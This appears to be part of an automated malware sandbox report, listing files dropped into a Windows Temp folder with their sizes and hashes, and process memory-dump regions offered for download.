C:\Users\Admin\AppData\Local\Temp\snhgmd.bat

Filesize
2.9MB

MD5
7834dbd67492fa350447dbd5debda5fc

SHA1
e008dff36158beb0425d32036d9f65d5653184bd

SHA256
d96f10a2672eb846ecb66d836dfe82933aca60094a367a90eee3aac0444a5573

SHA512
02ac02dfd61f1ce96f79899523aedd6efd26a269bfecf4507ad3008fa384f9f2d9c9fac71664f7f0b1f6bdf6a397ee6757c199c0971f0b9803409f0c48d7206a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ujlsid.cmd

Filesize
84KB

MD5
eaa3e4b0902f81aa785126b3012c8c9c

SHA1
be9c408a2e7bcafb84a369e638a77fd59f37a29f

SHA256
2661a4e4af22b940f85a00434b5f749bf49e8501127311d9835d1d466702e5bb

SHA512
96903a174592f3b6fb20e00a6e136b0b9fcf87ccdc53083840354f134345bd590f54d168b8e1b0a83769b57122662940f9b4edc3f6131a232bf312fdc3f2e1d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\whofyb.cmd

Filesize
67KB

MD5
e199ef3a0ff2eb56705a4361dbcb1ca4

SHA1
5d88a04d21f99ef816e79b72b9a9bc27c20bed3b

SHA256
f6211e04e4d6731ed85b229203a1e5f7f39e7859912aec34b448c91e30a7bd21

SHA512
059f7d989a7b04ea255d95fe79ffd2372e98d81b1583a1cb1e0bdf271a505f36b3454b0556c5883c1f063078aff3cc09bba5ef195956482fcdd18f662df05e44

Download Submit
C:\Users\Admin\AppData\Local\Temp\xgguca.cmd

Filesize
459KB

MD5
e66be463b033096c59d89d86924d03ad

SHA1
e7a5e8c0d0b198a25708f81942a574793679b726

SHA256
1bef15d7f7fed0f404e502daf6802f8fd3ce133a79850046dacc0c16f869598a

SHA512
b21d8794f1b195034dbb2a502702863c95b5ed3796a63dc3301fb10ce8f5c904e5351e1aa3eb5e2471a4f9303a71de85bc027185841946c5b9d842e9ebc524c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\xwjzda.cmd

Filesize
459KB

MD5
71d10a3b89c7d7ab3f45f59c6fa86b74

SHA1
13ccb31f2dc09f0251717d122b3aa51dce08f2d2

SHA256
1ba63c459ed1f904b7c9bb05d15cfcea2a7dd556c228a39ce614c0001a8f2749

SHA512
2fc7de4b0933663d7920e389e49d2645a70388488f1bc3d8bf962927465fb069f2e57cfdcf4fc627eb61289b5e8b87818a7d33a94bbfd106447bc371dae28827

Download Submit
memory/380-2969-0x00007FFD9A2E0000-0x00007FFD9ACCC000-memory.dmp

Filesize
9.9MB

Download
memory/628-2929-0x0000000073740000-0x0000000073E2E000-memory.dmp

Filesize
6.9MB

Download
memory/628-2932-0x00000000026E0000-0x00000000026F0000-memory.dmp

Filesize
64KB

Download
memory/628-2940-0x00000000026E0000-0x00000000026F0000-memory.dmp

Filesize
64KB

Download
memory/1036-12-0x00007FFD9A2E0000-0x00007FFD9ACCC000-memory.dmp

Filesize
9.9MB

Download
memory/1036-1-0x00007FFD9A2E0000-0x00007FFD9ACCC000-memory.dmp

Filesize
9.9MB

Download
memory/1036-2-0x000000001B5E0000-0x000000001B5F0000-memory.dmp

Filesize
64KB

Download
memory/1036-0-0x0000000000950000-0x000000000095E000-memory.dmp

Filesize
56KB

Download
memory/1036-1087-0x000000001B5E0000-0x000000001B5F0000-memory.dmp

Filesize
64KB

Download
memory/1188-2936-0x0000000006820000-0x0000000006830000-memory.dmp

Filesize
64KB

Download
memory/1188-2903-0x0000000073740000-0x0000000073E2E000-memory.dmp

Filesize
6.9MB

Download
memory/1188-2920-0x0000000006820000-0x0000000006830000-memory.dmp

Filesize
64KB

Download
memory/1188-2614-0x0000000006820000-0x0000000006830000-memory.dmp

Filesize
64KB

Download
memory/1188-2825-0x0000000008020000-0x000000000805C000-memory.dmp

Filesize
240KB

Download
memory/1188-2611-0x0000000006820000-0x0000000006830000-memory.dmp

Filesize
64KB

Download
memory/1188-2608-0x0000000073740000-0x0000000073E2E000-memory.dmp

Filesize
6.9MB

Download
memory/2968-1213-0x0000000009DF0000-0x000000000A022000-memory.dmp

Filesize
2.2MB

Download
memory/2968-1226-0x000000000A6C0000-0x000000000A8E2000-memory.dmp

Filesize
2.1MB

Download
memory/2968-1091-0x0000000073740000-0x0000000073E2E000-memory.dmp

Filesize
6.9MB

Download
memory/2968-2604-0x0000000073740000-0x0000000073E2E000-memory.dmp

Filesize
6.9MB

Download
memory/3256-1505-0x000001FA5C780000-0x000001FA5C790000-memory.dmp

Filesize
64KB

Download
memory/3256-1537-0x000001FA5C8D0000-0x000001FA5C8F2000-memory.dmp

Filesize
136KB

Download
memory/3256-1495-0x000001FA5C780000-0x000001FA5C790000-memory.dmp

Filesize
64KB

Download
memory/3256-1490-0x00007FFD9A2E0000-0x00007FFD9ACCC000-memory.dmp

Filesize
9.9MB

Download
memory/3256-2764-0x00007FFD9A2E0000-0x00007FFD9ACCC000-memory.dmp

Filesize
9.9MB

Download
memory/3256-2789-0x000001FA5C780000-0x000001FA5C790000-memory.dmp

Filesize
64KB

Download
memory/3256-2864-0x000001FA5C780000-0x000001FA5C790000-memory.dmp

Filesize
64KB

Download
memory/3256-1732-0x000001FA5CA90000-0x000001FA5CACC000-memory.dmp

Filesize
240KB

Download
memory/3256-1774-0x000001FA5CEA0000-0x000001FA5CF16000-memory.dmp

Filesize
472KB

Download
memory/4120-2884-0x00007FFD9A2E0000-0x00007FFD9ACCC000-memory.dmp

Filesize
9.9MB

Download
memory/4120-2906-0x00000188E6F50000-0x00000188E6F60000-memory.dmp

Filesize
64KB

Download
memory/4120-2909-0x00000188E6F50000-0x00000188E6F60000-memory.dmp

Filesize
64KB

Download
memory/4420-40-0x0000000009B40000-0x0000000009B62000-memory.dmp

Filesize
136KB

Download
memory/4420-39-0x00000000098D0000-0x00000000098EA000-memory.dmp

Filesize
104KB

Download
memory/4420-1501-0x0000000073740000-0x0000000073E2E000-memory.dmp

Filesize
6.9MB

Download
memory/4420-2513-0x00000000074E0000-0x00000000074F0000-memory.dmp

Filesize
64KB

Download
memory/4420-53-0x000000000A650000-0x000000000A8D6000-memory.dmp

Filesize
2.5MB

Download
memory/4420-48-0x0000000009D40000-0x0000000009FD8000-memory.dmp

Filesize
2.6MB

Download
memory/4420-47-0x000000000ACD0000-0x000000000B348000-memory.dmp

Filesize
6.5MB

Download
memory/4420-41-0x000000000A150000-0x000000000A64E000-memory.dmp

Filesize
5.0MB

Download
memory/4420-2196-0x00000000074E0000-0x00000000074F0000-memory.dmp

Filesize
64KB

Download
memory/4420-9-0x0000000004F60000-0x0000000004F96000-memory.dmp

Filesize
216KB

Download
memory/4420-11-0x00000000074E0000-0x00000000074F0000-memory.dmp

Filesize
64KB

Download
memory/4420-18-0x0000000008410000-0x0000000008760000-memory.dmp

Filesize
3.3MB

Download
memory/4420-10-0x0000000073740000-0x0000000073E2E000-memory.dmp

Filesize
6.9MB

Download
memory/4420-38-0x0000000009BB0000-0x0000000009C44000-memory.dmp

Filesize
592KB

Download
memory/4420-13-0x00000000074E0000-0x00000000074F0000-memory.dmp

Filesize
64KB

Download
memory/4420-14-0x0000000007B20000-0x0000000008148000-memory.dmp

Filesize
6.2MB

Download
memory/4420-23-0x0000000008A60000-0x0000000008AD6000-memory.dmp

Filesize
472KB

Download
memory/4420-15-0x00000000079D0000-0x00000000079F2000-memory.dmp

Filesize
136KB

Download
memory/4420-22-0x0000000008810000-0x000000000885B000-memory.dmp

Filesize
300KB

Download
memory/4420-21-0x00000000082A0000-0x00000000082BC000-memory.dmp

Filesize
112KB

Download
memory/4420-16-0x0000000007A70000-0x0000000007AD6000-memory.dmp

Filesize
408KB

Download
memory/4420-17-0x00000000083A0000-0x0000000008406000-memory.dmp

Filesize
408KB

Download
memory/4448-2743-0x00007FFD9A2E0000-0x00007FFD9ACCC000-memory.dmp

Filesize
9.9MB

Download
memory/4448-2757-0x0000020BCE8B0000-0x0000020BCE8C0000-memory.dmp

Filesize
64KB

Download
memory/4448-2962-0x00007FFD9A2E0000-0x00007FFD9ACCC000-memory.dmp

Filesize
9.9MB

Download
memory/4448-2754-0x0000020BCE8B0000-0x0000020BCE8C0000-memory.dmp

Filesize
64KB

Download
memory/4564-2796-0x0000025784AF0000-0x0000025784B00000-memory.dmp

Filesize
64KB

Download
memory/4564-2793-0x0000025784AF0000-0x0000025784B00000-memory.dmp

Filesize
64KB

Download
memory/4564-2767-0x00007FFD9A2E0000-0x00007FFD9ACCC000-memory.dmp

Filesize
9.9MB

Download
memory/5096-2891-0x0000024F59010000-0x0000024F59020000-memory.dmp

Filesize
64KB

Download
memory/5096-2888-0x0000024F59010000-0x0000024F59020000-memory.dmp

Filesize
64KB

Download
memory/5096-2870-0x00007FFD9A2E0000-0x00007FFD9ACCC000-memory.dmp

Filesize
9.9MB

Download